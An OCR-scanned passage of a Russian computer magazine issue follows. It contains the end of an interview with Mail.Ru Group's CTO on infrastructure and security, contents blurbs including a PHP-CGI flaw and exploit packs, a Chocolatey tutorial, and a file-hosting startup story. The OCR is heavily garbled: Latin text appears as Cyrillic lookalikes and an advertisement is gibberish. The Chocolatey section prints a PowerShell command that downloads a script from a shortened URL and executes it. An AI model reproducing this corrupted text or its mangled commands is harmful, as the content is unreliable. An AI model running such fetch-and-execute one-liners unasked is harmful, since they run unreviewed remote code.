«рецепт», который я обычно советую. Как, 
наверное, и все компании, мы начинали с ап- 
паратных балансировщиков и перепробовали 
многие. Это было давно. Потом мы поняли, что 
любая аппаратная платформа рано или поздно 
загонит вас в свои рамки, которые у нее обяза- 
тельно существуют. Поэтому в данный момент 
мы пришли к тому, что используем баланси- 
ровку на Ыпих ІРѴ5. Во-первых, это позво- 
ляет нам обрабатывать большое количество 
пакетов в секунду (для нас это принципиально: 
МаіІ.Ри бгоир — это история о высоких на- 
грузках). Во-вторых, это позволяет встраивать 
балансировщики в нашу систему. То есть мы 
можем балансировать любой сервис, который у 
нас существует. 

У нас есть довольно высоконагруженный 
комплекс, который обеспечивает работу 1п5(ап( 
Меззепдег'ов. Его тонкость заключается в том, 
что любой клиент — это постоянное соединение 
с вашим сервером. Наш комплекс тянет около 
150 000 клиентов на одном сервере, а это до- 
вольно много. Конечно, это тоже потребовало 
изменений именно в сетевой части. 

Выключить портал МаіІ.Ри целиком очень 
сложно, и в последнее время таких проблем у 
нас не было. Но конечно, в определенные мо- 
менты у нас могут быть какие-то аварии, которые 
затрагивают небольшую часть пользователей. 

Мы стараемся строить нашу систему таким 
образом, чтобы, даже если какой-то модуль 
неработоспособен, все остальное при этом ра- 
ботало. Это своего рода философия разработки. 

У ребят, которые приходят из других компаний, 
я очень часто вижу следующее: пишется моно- 
литный кусок кода, и если он не работает, то он 
не работает целиком. Это то, за чем мы всегда 
целенаправленно следим. Условно говоря — нет 
у тебя сегодня доступа к этой базе данных, но 
всю остальную работуты можешь сделать. Это 
позволяет нам, убрав какой-то блок со страницы, 
иметь рабочую систему. 



БЕЗОПАСНОСТЬ В МАІЕЛО ОВООР 



Проблема ООоБ, к счастью, стоит далеко не на 
первом месте. Последний раз мы чувствовали 
ООоЭ, наверное, лет семь назад. Когда ваша 
сеть может пропустить полтерабита трафика, 
когда у вас десять тысяч серверов, положить их 
довольно сложно. 

Информационная безопасность — это 
вопрос, над которым мы думаем постоянно; 

это то, в чем никогда нельзя быть уверенным. 
Скажем, мы твердо знаем, что наш программный 
комплекс потянет некую нагрузку. Но я никогда 
не могу быть уверен, что никто не найдет ника- 
ких уязвимостей в коде. Неттакой технологии, 
которая позволила бы с гарантией забыть об 
этой проблеме. 




Именная скамейка Мой МирШМаіІ.ги 



КОГДА ВАША СЕТЬ МОЖЕТ ПРОПУСТИТЬ 
ПОЛТЕРАБИТА ТРАФИКА, КОГДА У ВАС 
ДЕСЯТЬ ТЫСЯЧ СЕРВЕРОВ, ПОЛОЖИТЬ 
ИХ ОООЗ'ОМ ДОВОЛЬНО сложно 
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Интервью с техническим директором МаіІ.Ри Згоир 



Систем для обнаружения вторжений, в том 
смысле, в котором об этом говорят обычно, у нас 
нет. По идее, я должен бы назвать пару брендов, 
а у нас их нет. У нас есть система Ю5, которую 
мы пишем сами. У нас огромное количество 
специфичного для нас ПО, и мы знаем, как оно 
работает. Также есть довольно большое количе- 
ство скриптов и софта, которые анализируют ра- 
боту наших систем. Вплоть до того, что мы можем 
поймать нехарактерный для нашего ПО запрос в 
базе данных, поймать нехарактерную нагрузку 
в тот или иной момент. Никогда не знаешь, в чем 
именно у тебя проблема, но можешь мониторить 
те действия, которые нетипичны для твоего про- 
граммного комплекса. 

В компании существует система работы 
с ргосіисііоп-серверами. Любая активность, 
которая не укладывается в стандартные мани- 
пуляции, тут же будет замечена. Иными словами, 
если кто-то из наших сотрудников случайно, 
в процессе какой-то работы, зайдет на сервер 
не так, как это делается обычно, сразу придет 
уведомление об инциденте. 

У нас есть отдел информационной безопас- 
ности, в задачу которого входит именно 
постоянный репе(га(іоп (евііпд. Они постоянно 
сканируют наши серверы и пытаются что-нибудь 
где-нибудь сломать. Порой им это удается, по- 
тому что невозможно писать систему вообще без 
проблем. Хочется надеяться, что за счет этого мы 
защищены от внешних вторжений лучше, чем те 
люди, которые этого не делают. 



РАБОТА в МАіі.риероир 



Честно признаться, я горжусь очень многими 
сотрудниками МаіІ.Ри бгоир. Особо выделить 
можно, например, Игоря Ермакова, который уже 
лет восемь работает с нами, и это один лучших 
ІТ-специалистов, что я знаю в стране. У нас 
работает очень сильная команда эксплуатации, 
возглавляет ее Алексей Бажин. На наш взгляд, 
это самые лучшие сисадмины :). Еще я могу 





Когда-то такой стол был и у нас в редакции :) 



выделить Андрея Калинина, который руководит 
разработкой поиска. Поиск для нас довольно но- 
вый продукт, по сравнению с другими компания- 
ми мы нетак давно им занимаемся. Но сейчас 
это однозначно самая наукоемкая и самая инте- 
ресная разработка, которая у нас происходит. 

Могу сказать, что за эти 10-11 лет нам уда- 
лось привлечь очень много сильных ребят. Мы 
стараемся набирать людей, которые горят рабо- 
той. Я сейчас говорю не о тех людях, которые 24 
часа в сутки проводят на работе, я говорю о тех, 
кому работа на самом деле нравится, о тех, для 
кого это также, как и для меня, — хобби. Любой 
начальник старается подбирать людей по себе. 
Надеюсь, нам удалось собрать именно ту коман- 
ду профессионалов, для которых работа — это 
все-таки нечто большее, чем просто работа. 

На собеседовании вы сначала поговорите со 
своим будущим руководителем о вашем тесто- 
вом задании. Потом с вами, как правило, пого- 
ворю я лично. Конечно, во главе угла у нас стоят 
знания и блеск в глазах, но собеседование у нас 
довольно сложное. Мы стараемся сделать так, 
чтобы у нас работали только профессионалы. 

В МаіІ.Ки Сгоир работает стажерская про- 
грамма. Мы набираем ребят из университетов и 
просто людей, которые хотят прийти и поучить- 
ся. Они стажируются в реальных отделах разра- 
ботки, в реальных группах эксплуатации. После 
окончания программы стажировки они могут 
остаться с нами, если им понравилось. И многие, 
к счастью, остаются. 



ПОПУЛЯРИЗАЦИЯМИ 
ПРОФЕССИИ ІТ-ШНИКА 



Мы стараемся популяризировать работу 
ІТ-шника. Например, вспомните свое детство — 
человек хочет стать космонавтом, врачом, лет- 
чиком... Очень мало кто хочет стать ІТ-шником, 
так что мы поставили себе задачу, чтобы даже 
маленькие дети хотели стать ІТ-шниками. Это 
очень интересная профессия, а главное — за ней 
огромное будущее. 



У нас есть три направления, по которым 
мы на данный момент работаем. Надеюсь, со 
временем их станет больше. Основная наша за- 
дача — сделать так, чтобы профессия ІТ-шника 
стала популярной и люди знали, что в МаіІ.Ри 
бгоир работают очень умные ребята и здесь 
интересно. 

Первое: образовательные программы с 
вузами. На базе МГТУ им. Баумана мы обучаем 
студентов и стараемся сделать так, чтобы, окон- 
чив вуз, эти люди могли гарантированно пройти 
собеседование в любой крупной ІТ-компании 
России. Наша задача — чтобы после окончания 
вуза человек стал специалистом в той области, 
в которой он обучается. Чтобы у него не просто 
был набор базовых знаний, а чтобы появились 
практические навыки, необходимые для работы. 

Второе: мы проводим кубок по програм- 
мированию Вивзіап Сосіе Сир. Можно сказать, 
что это настоящий спорт высоких достижений, 
в процессе соревнований ребята на скорость 
решают очень сложные как с математической, 
так и с алгоритмической точки зрения задачи, 
и пусть подобный спорт довольно далек от при- 
кладного программирования, зато он популяри- 
зирует профессию ІТ-шника. Этим занимаются 
совершенно гениальные ребята, и за ними 
можно наблюдать с таким же удовольствием, как 
за любым олимпийским соревнованием. 

И третье: два раза в год мы проводим конфе- 
ренцию «Форум технологий». На ней мы делим- 
ся знаниями и навыками, которые наработали в 
нашей компании. Форумов технологий два: один 
посвящен эксплуатации, второй — разработке. 
Мы стараемся пригласить тех людей, которые 
могут что-то дать нашей аудитории. Как правило, 
это западные докладчики. На последнем Форуме 
технологий можно было услышать более 20 до- 
кладов об эксплуатации ІІМІХ-систем и инфор- 
мационной безопасности таких известных спе- 
циалистов, как КгІ5 Виуіаегі, Саггеи Нопеусии, 
ЭозЬиа ТЫеззеп, и, конечно же, специалистов из 
МаіІ.Ри Сгоир. 
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МЕГАУЯЗВИМОСТЬ В РНР-С6І 

Несмотря на взрывной ростРиЬу, РуШоп 
и многих других прогрессивных языков 
программирования, большинство 
веб-проектов по-прежнему разра- 
батываются настаром добром РНР. 
Отсутствие проверок пользовательского 
ввода, логические ошибки и большое 
количество костылей, оставленных горе- 
программистами, по-прежнему радуют 
людей, которые ломаютсайты. Вместе 
стем подприцел взломщиковвсечаще 
стал попадать сам интерпретатор, в ко- 
тором уже не раз находились серьезные 
уязвимости. Последняя из нихособенно 
опасна, так как позволяет вы пол нить код 
налюбомсервере, где РНРнастроен для 
работы по интерфейсуСбІ. 
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Пока М іеговой тормозит с релизом своего 
собственного магазина приложений, 
быстроустанавливатьи обновлять 
программы можно с помощью СЬосоІаІеу. 
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Наш автор не испугался натиска 
копирастов и конкуренции со стороны 
РарісІЗЬаге и решил создатьсвой 
собственный сервис для обмена файлами. 
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Системы контроля версий позволяюткол- 
лективноработатьнадпроектомивести 
историю любых изменений. Выбираем 
правильный кл иент для 5ѴМ,біС МегсигіаІ. 



ВЗЛОМ 



МАШАЯЕ 
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5МВЯЕ1АУВНАШИДНИ 

Реинкарнация древней МІТМ- 
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ПРОБИВАЕМѴМШЯЕѴСЕМТЕЯ 

Реальная история взлома, рассказы- 


66 




атаки, позволяющей получить 




вающая, каколдскульные методы про- 





несанкционированный доступ никновения работаютпротивтрендовых 

к удаленным ресурсам. облачныхтехнологий. 



СВЯЗКИ СПЛОИТОВ : ЧТО ВНУТРИ? 

Какустроен сплоит-паки какие 
уязвимости чаще всего используются 
их создателями для сІгіѵе-Ьу-сІоѵѵпІоасІ 
атак — разбираемся вэтом материале. 
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РАЗ ОПРЕДЕЛЯЕМ ЗАНОВО ПОНЯТИЕ 



“ПРОИЗВОДИТЕЛЬНОСТЬ ДИСКОВОЙ СИСТЕМЫ”. 



ііі:ік.\ѵпі:\ — вершина (англ., суід., ед. ч.): 

I . НмСШІІЯ точка. 

Н ас точкч» іг ноос. к‘ ко'і'ороіі 'физ'сльпо сі'рсмится 

МО'І'ОК 'ІВЙЛ, 

Кііч)ша(>іс[^і[ікіх і'схлогиіі тіч! 

а) аізофсо'з лііскоеюГі іірои'шодкі'с.'іышс] и: Успех прсіілаі ает 

прсиосхолмыс ОЩуНЕСИЛЯ ВЫЧІІС.'ІМ [СЛІЛОІІ? ТІЕ>ІС9 ролсііс] вмя; 

о) каждьііі іш ставит (ювую іілаііку ячя ТЕк.‘рлоте.-]ыіЕііх 
накоііЕі ]с:іс!І 

к) кулЕЛПіііашЕЯ іі|Н?фсссЕіі:чіалівма и лді.лошш ЕМсхіісиЕотмях 
і ) не идёт СЛСДОЧ1 !іі лруі Еі\іц, чЕобі.1 щнчсни 1 1. ллдсрсіЕю; Іііііспкшир, 




МАХ /ОРЗ 




ВысйЧвійшчій й ИРідустргіігі 
бііі^ТрОД 4 іЙСГІИ 4 «ПйрЙЦИЙ 
пяада/выйРДа нппрть др 
120 000 І 0 Р 5 




Рвешнрені^ый пт^т упраелеиия 
мятью ДП^ ѴЁ&^ИЧ 0 НИЯ 
еіПйз.йустййчИЁ>&стн и мадбжяйстн. 




Лучшая прогі ЛОДИТОЛЬИОСТь ѳ 
режима итюиадачн 1 К 1 }А » с^ыом 
иінро№Мі круге прыложеинй 
олре^нчени» и>а сжимаемость дамнык. 



Уже четвёртый год подряд очередное понсме-ннё 
ті^рдогельиых накопителей ( 550 ) ОС^ ѵеггех переопределяет 
современные вьжчислительн^е еоаможностм.^эгодар? усиленной 
прюмзводѵтчльмостн И отк элоустойчи востн Рз-эработаннви дл« 
маилу'^шеЯ в и ндустриіі скорости лередач и данны^( и лревосксдиой 
отаып^ііипгѵгги І^ІІГГЙМЫ глрия ОС7 •! ШірМЭНАНЯ [ІЯНОНР 

р^крыть ПРПьюв^тслю р^бочи^ ьіГровыс и мультимедийный 
прилон<лния. кяк никакое иное рл-іивний- с|№ди дискряык 
накопиг^ей. 



Быстрое еремя эагру.зкн и 
уникально ннзЕВй пвтектнинить,, 




ѴЕАРг 

!№л.ііа-ц-А ЫТѴ' 



Лучшая Б индустрии гарантий лог. 





Розница; 



I дгоі 



КНШГЛі ШгІІНМА «ИйЛі ШЯЛЬ 4*1 Лі 



■ч.ѣіЪ>« ййіИЫ іМКІін 



Реклама 





РС20ЫЕ 



Анатолий «апаіооіу», веб-разработчик (апаіооіуйдтаіі.сот) 



шоколадный 

менеджер 
пакетов 



БЫСТРАЯ УСТАНОВКА 
И ОБНОВЛЕНИЕ 
СОФТА С ПОМОЩЬЮ 
СНОСОСАТЕѴ 



Менеджер пакетов — привычный инструмент, 
без которого уже невозможно представить 
Ыпих и который до сих пор не реализован 
Місгозоі'і'ом в ѴѴіпсІоѵѵз. Вот и приходится под 
виндой вручную скачивать дистрибутивы 
приложений, вручную их устанавливать и по 
отдельности обновлять. Но ровно до тех 
пор, пока не установишь альтернативный 
менеджер пакетов. Например, Сбосоіаіеу. 



ЗАЧЕМ НУЖЕН ПАКЕТНЫЙ МЕНЕДЖЕР 

Что нужно сделать, чтобы установить приложение под ѴѴіпсІоѵѵз? 
Зайти на сайт с дистрибутивом программы, скачать его и прой- 
ти квест из нескольких шагов установщика. Менеджер пакетов 
позволяет получить тот же результат, набрав лишь одну команду 
«установить такое-то приложение». При этом он сам скачает не- 
обходимые файлы, проверит, не нужно ли установить дополнитель- 
но что-то еще (например, необходимые библиотеки), и выполнит 
процедуру установки. Весь софт находится в одном месте — специ- 
альном репозитории, причем таких репозиториев может быть не- 
сколько (а ты можешь легко подключать и отключать их). В репози- 
тории часто хранится несколько версий каждого приложения, в том 
числе самая актуальная. Таким образом, не проблема обновить 
нужные программы и на своем компьютере — для этого опять же 
используется одна команда. Причем никто не мешает обновить все 
сразу. Единый репозиторий с софтом находится под пристальным 
вниманием общественности, что гарантирует высокий уровень 
стабильности и отсутствие вирусов. Пользователи Ыпих-систем 
сейчас скажут: «Смотрите, Капитан Очевидность пришел!». И дей- 
ствительно, менеджер пакетов под туксом — это все равно что 
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ПОКА МІСП050РТ ТОРМОЗИТ 
С РЕЛИЗОМ СВОЕГО 
СОБСТВЕННОГО МАГАЗИНА 
ПРИЛОЖЕНИЙ, МЫ 
ПОПРОБУЕМ СНОСОСАТЕУ 

кнопка «Пуск» под виндой (пусть даже в новомодной «восьмерке» 
ее и нет). В той же ІІЬипІи команда арі-деі — основной инструмент, 
позволяющий быстро установить и обновить необходимый софт. 

И пока МІСГ050Й телится с релизом своего собственного магазина 
приложений (а он, хочется верить, все-таки появится в ѴѴіпсІоѵѵз 8), 
давай познакомимся с доступной уже сейчас удачной реализацией 
этой идеи — менеджером пакетов СЬосоІаІеу ( ѵѵѵѵѵѵ.сЬосоІаІеу.огд ]. 

БЫСТРЫЙ СТАРТ 

Устанавливается СЬосоІаІеу довольно необычно. Для этого раз- 
работчики предлагают специальный скрипт, который запускается 
из консоли: 

@роыег5Ііе11 -МоРгобІе -Ехеси1;іопРо1ісу ипге5І;гіс1;есІ \ 
-СотшапсІ "іех ( (пеы-оЬдес1; пе1; .ыеЬсІіепІ;) . 

Ооѵ\/п1оасІ51:гіп§( ' Іі1;1;р : //Ы1; . 1у/р5СІіосІп5І;а11 ' )) " 



Правда, в системе должны быть предварительно установлены 
.МЕТ Ргатеѵѵогк 4.0 и РоѵѵегВЬеІІ 2.0. Если все пройдет хорошо, то 
менеджер пакетов сразу можно пробовать в действии. Для приме- 
ра предлагаю быстро установить популярный архиватор 7-2ір: 

СІП5І: 7гір 

Одна команда, несколько секунд ожидания — и новое приложе- 
ние появилось в системе. Все рутинные действия автоматизирова- 
ны. Нам не требуется скачивать дистрибутив, запускать его, прохо- 
дить череду кнопок «Далее», после чего удалять инсталляционный 
файл, — все это делает СЬосоІаІеу. Мало того, обычная установ- 
ка — это было бы слишком просто: при специально подготовлен- 
ном пакете осуществляется конфигурация установленного софта 
с внесением нужных параметров и корректировок. То есть основной 
идеей является не установка кактаковая, а получение в распоря- 
жение готового, настроенного, отточенного инструмента, с которым 
можно сразу начать работу без лишних геморройных манипуляций. 

Список пакетов довольно обширен и постоянно пополняется, 
так что ты сможешь установить абсолютно все, что пожелаешь. 
Добавь к команде сіпзі любое из перечисленных ниже названий 
пакетов и тутже получишь готовый к использованию софт. 

КОМАНДЫ МЕНЕДЖЕРА ПАКЕТОВ 

Установка — это, естественно, не единственная команда СЬосоІаІеу. 
Их несколько, причем можно использовать как полные нотации ко- 
манд (сЬосоІаІеу іпзіаіі/ирсіаіе/іізі), так и их алиасы для сокращения 
(сіп5І/сир/сІІ5І). Все команды можно разделить на несколько групп: 



НЕКОТОРЫЕ ПРОГРАММЫ ИЗ РЕПОЗИТОРИЯ СНОСОІАТЕУ 



Редакторы 

кода: 



МоЩрасІ++ 5иЫітеТехі2 МоЩрас12 




Ргодгаттег'з 

Моіерасі Архиваторы: 




тіпКАР! 



Огн> 



Облачное 

хранилище: ОгорЬох 



Работа с векторной ^ Менеджер 

графикой: іпкзсаре паролей: 




КееРазз 



Менеджер 

заметок: 




ЕѵегпоЩ 



Обработка книг 
для КіпсІІе: 




СаІіЬге 



РТР-клиент: 






Рііегша Видеоплеер: 




ѴІС 



Музыкальный 

плеер: 




ІооЬаг2000 



Читалки 

РОР: 





АсІоЬе Реасіег Рохк Реасіег РОРСгеаШг 



Системы 

контроля 

версий: 



•В ^ 




Нд ТогШізеНд ТогШізебіі 



Голосовая 

связь: 



5куре 



Скриптовые 

языки: 






ІЮОвІГл 



РНР 



РиЬу Ру^Ьоп 



Мос1е.)з 



Базы 

данных: 



му5ас 





Му501 МопдоОВ Роз^дгеЗОІ 




Ѵ._- 

501 Зегѵег 
Ехргезз 
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1. Инсталляция. Простой пример установки пакета мы уже при- 
водили: 

СІП5І: сІгорЬох 

Установим теперь 55Н -клиент под ѴѴіпсІоѵѵз РиТТУ последней 
или определенной версии: 

сііосоіаііеѵ іп5І:а11 ри1:1:ѵ 

сІіосо1а1;еу іп5І:а11 ри1;1;у -ѵегБІоп 0.61 

Для установки можно также обозначить источник пакета и ука- 
зать дополнительные параметры: 

сІіосо1а1;еу іп5І;а11 ри1;1:у -Боигсе с:\Боте-Ро1сІег 
сііосоіаііеу іпБІіаІІ ри1:1;у -Боигсе \\БотеБегѵег\БотеБІіаге 
сІіосо1а1;еу іпБІ;а11 ри1:1;у -іпБІ:а11Аг§Б "/яЬ" -оѵеггісіе 




2. Обновление. СЬосоІаІеу позволяет обновить либо конкретный 
пакет: 

сир СІгорЬох 
либо все имеющиеся: 

(±осо1а^еу идсі 

3. Запрос информации. Следующая команда позволяетполучить 
информацию о пакете: 

СІІБІ: СІгорЬох 

Сам список всех доступных команд можно запросить таким 
образом: 

сЬосо1а1;еу /? 

КАК ВСЕ УСТРОЕНО ИЗНУТРИ? 

По правде говоря, в основе СЬосоІаІеу лежит другой менеджер 
пакетов — МиСеС Он довольно специфичен и ориентирован скорее 
на .МЕТ-разработчиков, которые применяют его для управления 
сторонними библиотеками. Создателям СЬосоІаІеу удалось ис- 
пользовать его, чтобы сделать менеджер пакетов для обычных 
людей. Если заглянуть внутрь СЬосоІаІеу, то мы увидим МиОеСехе, 
набор управляющих скриптов, а также вспомогательные функции, 
которые будут полезны при создании пакетов. Среди послед- 



Описание пакета сІІРІ, сигі.пизрес 

них: ІПБІаІІ-СЬосоІаІеуІПБІаІІРаскаде, ІП5ІаІІ-0еІ-СЬосоІаІеуСІП2Ір, 
СЬосоІаІеуОеБкІорЫпк и еще ряд других, выполняющих действия 
загрузки файлов по сети, распаковки, размещения ярлыков. При 
установке пакета, в зависимости от его содержимого, выполнится 
череда действий: 

1. Пакет распаковывается в папку С:\СЬосоІаІеу\ІіЬ. 

2. Если в пакете присутствуют исполняемые файлы, СЬосоІаІеу 
создаст для них ярлыки автоматически (пропишет в раіЬ), и ты 
сможешь получить доступ к установленному инструменту из 
своей системы. 

3. В пакете может быть установочный скрипт пакета 
сЬосоІаІеуІПБІаІІ.рзІ. Он автоматически выполняется, причем 
его содержание может быть абсолютно любым: все зависит 

от потребностей и фантазии составителя пакета и ограничений 
РоѵѵегВЬеІІ. Как правило, такой сценарий состоит из последо- 
вательного вызова вспомогательных функций (я о них говорил 
выше), которые выполняют стандартные действия вроде за- 
грузки дистрибутива из Сети и его тихой установки. 

4. При загрузке установщика пользователю отображается 
прогресс-бар, а также обильный лог выполнения инсталляции. 
Тихая установка, как правило, требует права администратора. 
Более того, во время такой установки могут появляться запросы 
от компонента безопасности СІАС. 

В терминах менеджера пакеты разделены на приложения и ин- 
струменты. Приложением является пакет, содержащий оригиналь- 



АЛЬТЕРНАТИВНЫЕ МЕНЕДЖЕРЫ ПАКЕТОВ ПОД ѴѴІМ00ѴѴ5 



За все время было множество 
попыток реализовать удобный 
пакетный менеджер для винды, 
однако по сей день ничего 
удовлетворяющего большинство 
потребностей нет. Все надежды 
на скорый выход встроенного 
в ѴѴіпсІоѵѵз менеджера пакета или 
Маркет, но ѴѴіпсІоѵѵз 8 показывает, 
что до этого еще далеко. 



МіпКе 

піпі^е.сот 

Цель этого проекта — автома- 
тизировать установку наиболее часто 
используемого софта. Идея такая: ты 
заходишь на сайт, выбираешь нужные 
тебе приложения и скачиваешь готовый 
для использования инсталлятор, ко- 
торый без лишних вопросов установит 
все выбранные программы. Для выбора 
доступно большое количество открытых 
и бесплатных проектов. 



АМшуаррз 
аіітуаррз.сот 

Популярный менеджер пакетов, кото- 
рый предлагает для быстрой установки более 
15 тысяч десктопных и веб-приложений. Под- 
держивает «тихую установку» приложений 
и их автоматическое обновление. Но что еще 
более интересно, так это возможность через 
облако синхронизировать программы между 
несколькими компьютерами. К примеру, если 
устанавливаешь что-то на своем домашнем 
компьютере, то эти приложения можно сразу 
же «зеркалировать» на ноутбук. 
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ный инсталлятор программы, после установки которого прило- 
жение можно удалить через стандартный инструмент «Установка 
и удаление приложения» (он находится в панели управления). 

В свою очередь, инструментом является программа, не требую- 
щая установки. Фактически это исполняемые файлы (программа, 
библиотека), никак не привязанные к системе. По умолчанию они 
устанавливаются в папку С:\СЬосоІаІеу\ІіЬ. 

СПОСОБ СОЗДАНИЯ НОВЫХ ПАКЕТОВ 

Проект СЬосоІаІеу предлагает репозиторий с большим количе- 
ством готовых к использованию пакетов. Но легко можно пред- 
ставить ситуацию, когда нужно будет создать свои собственные 
пакеты. К примеру, если ты администрируешь офис, то было бы 
довольно заманчиво составить пакеты с общим для всех компью- 
теров софтом и в дальнейшем одним нажатием ставить их из рас- 
шаренной папки по сети, выполняя автоматическую настройку. 

Любой пакет представляет собой файл-архив с расширением 
.МІІРК6. Внутри находится ХМІ-описание пакета (файл с расшире- 
нием .МІІ5РЕС) и в папке І00І5 — скрипты (втом числе скрипт для 
установки сЬосоІаІеуІпзІаІІ.рзІ) и файлы, необходимые для установки. 

Для примера попробуем создать пакет для инструмента сІІРІ. 
Название файла описания должно соответствовать названию 
пакета — сигі.пизрес. Версия файла обязательна для поддержания 
версионности инструментария. В директории Іооіз необходимо 
расположить все необходимые библиотеки для сІІРІ (ІіЬсигІ.сІІІ, 
ІіЬззІ32.сІІІ) и непосредственно исполняемый файл сигі.ехе. Далее 
можно перейти в папку с описанием проекта и следующей коман- 
дой собрать пакет: 

пи^еі: раск 

На выходе мы получим файл сиг1.7.25.0.пиркд — этот пакет 
можно использовать для установки приложения из локального 
репозитория. Заметь, у нас нет никакого установочного скрипта: 
все файлы просто переносятся в С:\СЬосоІаІеу\ІіЬ\сигІ.7.25.0 и ста- 
новятся доступными в консоли. Более сложные случаи создания 
пакетов и загрузки их в репозиторий хорошо описаны в документа- 
ции СЬосоІаІеу. 

резюмируя" 

СЬосоІаІеу — это привкус арі-деі под ѴѴіпбоѵѵз. Хочется, чтобы 
ты воспринимал СЬосоІаІеу как нечто большее, чем просто 
менеджер пакетов. Если ты разработчик, ты можешь быстро 
настраивать свою среду окружения, собрав собственный пакет 
с требуемыми языками и ЮЕ, и в момент разворачивать все 
необходимое. Если тебе приходится администрировать не- 




Установка конкретной версии пакета РиТТУ 




пидес 





УШИ 

• Официальный сайт 
проекта: 
сИосоІа^еу.огс: 

• репозиторий 
проекта с открытой 
АрасЬе-лицензией: 
аИНиЬ.сот/сНосо- 
Іаіеу/сИосоІаіеу: 

• репозиторий 
коллекции описаний 
пакетовг дИЬиЬ.сот/ 
!егѵеп^сосІег/пидеЬ 
раскааез . 



ішл 

Тихая установка — 
режим установки 
ПО, при котором 
без вмешательства 
пользователя 
производится 
инсталляция со 
стандартными 
параметрами. Может 
быть в большинстве 
случаев запущена 
самостоятельно из 
командной строки 
с параметрами \5, 
\циі(е. 



СЬосоІаІеу и МиОеІ одинаковы и внешне и внутри 



сколько десятков компьютеров, то СЬосоІаІеу поможет не 
только установить нужные приложения на всех компьютерах, но 
и решить задачу с их обновлением. Я уже не говорю о том, как 
здорово просто иметь нормальный менеджер пакетов и устанав- 
ливать большую часть софта с помощью одной-двух консольных 
команд. Тебе кажется, что под виндой такой подход — извраще- 
ние? Может быть, но зато как удобно! ^ 



СоАрр 
соарр.огд 

Проект, разрабатываемый внутри 
МІСГ 050 Й, цель которого — разработать среду 
для доставки, компиляции и создания паке- 
тов из Ореп 5оигсе приложений. Уже сейчас 
СоАрр предоставляет механизм быстрой 
установки приложений в системе, поддержи- 
вает работу с несколькими версиями пакета, 
предоставляет возможность обновления. 

Но пока, увы, это лишь игрушка в руках раз- 
работчиков. 



2еиАРР 

2еі 

Это не совсем менеджер пакетов, 
но зато очень достойный и хорошо структу- 
рированный каталог полезных приложений, 
с помощью которого можно быстро загру- 
зить актуальные версии их дистрибутивов. 
У разработчиков было желание превратить 
2еиАРР в полноценный менеджер пакетов, 
но, увы, новых фич в проекте давно не по- 
являлось. 




зимо 

ксБоНѵуагез.сот 

Название программы расшифровыва- 
ется какЗоНѵѵаге Іірсіаіе Мопііог, и оно оправ- 
дывает реализованный в ней функционал. 
511Мо довольно сносно определяет версию 
установленных в системе приложений 
(правда, далеко не всех) и позволяет автома- 
тически накатить все необходимые апдейты. 
Надо понимать, что это не менеджер пакетов, 
но утилита, способная сильно упростить про- 
цесс поддержки ПО. 
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Никита Яни, интернет-предприниматель (уапійуапі.ги) 



1 




г 










1 




г , п 


г _ 


и 


и 


1 





каким 

должен быть 



ФАЙЛХОСТИНП 



ИСТОРИЯ ЗАПУСКА СЕРВИСА 
для ОБМЕНА ФАЙЛАМИ ОТ ЕГО 
СОЗДАТЕЛЯ 

Запускать файлхостинг сейчас — большая авантюра. Наличие 
внушительного числа конкурентов и прессинг со стотороны 
правообладателей не помешали автору пойти на эксперимент 
и убедиться, что спрос на качественный сервис есть. Как создавался 
файлхостинг, который придется по душе пользователям, и сколько 
на этом можно заработать — в отчете от создателя Мекака.сопп. 



ФАЙЛХОСТИНГ: ПРОШЛОЕ 
И НАСТОЯЩЕЕ! 

Первым крупным игроком на рынке файлхо- 
стинга стала всем известная «Рапидшара» 
( гарісІзЬаге.сопп ]. Этот сервис вырос до таких 
размеров, что перестал пользоваться услу- 
гами хостингов и сам стал большим провай- 
дером. Его популярность породила огромное 
количество клонов. Ты наверняка хотя бы раз 
пользовался большинством из них: УоиЗепсІк, 
5епс15расе, ОерозііРіІез. Особняком от этих 
проектов встал сервис ОгорЬох, по сути вы- 
полнявший те же функции (хранение и пере- 
дача файлов в Сети), но сфокусировавшийся 
на синхронизации документов между устрой- 
ствами. Позже компанию ОгорЬох составили 
Ооодіе Огіѵе и МісгозоЙ ЗкуОгіѵе. Почти одно- 
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Аскетичный дизайн Мекака.сот 



Загруженные файлы 



временно с этим началась волна судебных 
разбирательств по отношению к файлооб- 
менникам, которые, по мнению правоохра- 
нительных органов, выросли на пиратстве. 
Часть из них закрыли, и толпы пользова- 
телей стали искать, где и как теперь им пере- 
давать файлы по интернету. Однако найти 
действительно удобный сервис оказалось 
не так-то просто. В классическом файлооб- 
меннике стремление создателей продать как 
можно больше платных аккаунтов («конверт 
в премиум») сделало бесплатное пользова- 
ние проектами настоящей пыткой — обилие 
рекламы, ожидание загрузки, ограничение 
скорости (пока не заплатил), отсутствие 
синхронизации. В ОгорЬох'е с синхронизаци- 
ей и шарингом как раз все в порядке, но есть 
другая проблема. Если ты решил выложить 
файл на какой-нибудь популярный ресурс 
и дать ссылку на ОгорЬох для скачивания, 
то сервис заблокирует этот файл за пре- 
вышение трафика (в то время как обычные 
файлхостинги готовы платить за размещение 
ссылок на них на посещаемых сайтах). Кроме 
того, в ОгорЬох'е сильно ограничен набор 
способов загрузки файлов в свой аккаунт, 
а передать файл другу, не зарегистрировав- 
шись, вообще невозможно. 



БЫТЬ ИЛИ НЕ БЫТЬ? 

Поняв, что проекта, который бы сочетал 
сильные стороны ОгорЬох и простоту гаііі.ги, 
не существует, я решил пойти на небольшой 
эксперимент и создать с минимальными за- 
тратами прототип такого сервиса. Идея была 
простая: взять бесплатный скрипт файлооб- 
менника, поставить его на средний сервак, 
но обязательно на гигабитном канале и бес- 
платно раздать ограниченному кругу лиц 
безлимитные аккаунты. Нужно было понять, 
готовы ли пользователи двигать на новые 
сервисы, или же они будут продолжать поль- 
зоваться старыми, но привычными файлхо- 
стингами, даже несмотря на все их неудоб- 
ства. Глупо считать, что если сделаешь 
убойный сервис, то все пользователи сразу 
будут твоими. Например, заставить юзера 
сменить имейл почти нереально. Именно по 
этой причине у таких динозавров, какУаЬоо, 
Ноітаіі и АОЕ, до сих пор миллионы пользо- 
вателей. Первый же месяц должен был дать 
ответ: нужен такой сервис пользователям 
или нет. 

В качестве сервера был выбран Хепоп 
Х3430 /8 Г6/2Х200 Гб РаісП ( ЗегѵегсІиЬ. 
СОПП/Р210 ). которого должно было с лих- 
вой хватить. Никаких высоконагруженных 



настроек сделано не было — стоял стан- 
дартный АрасЬе, бесплатно установленный 
админами хостинга. Скрипты файлообмен- 
ника с нуля разрабатывать не пришлось 
(это было бы по меньшей мере глупо). После 
быстрого анализа было найдено несколько 
вполне годныхдля использования решений: 
отріоасіег, ЗугарЬе, РіІе2, ХігаРіІе. Я выбрал 
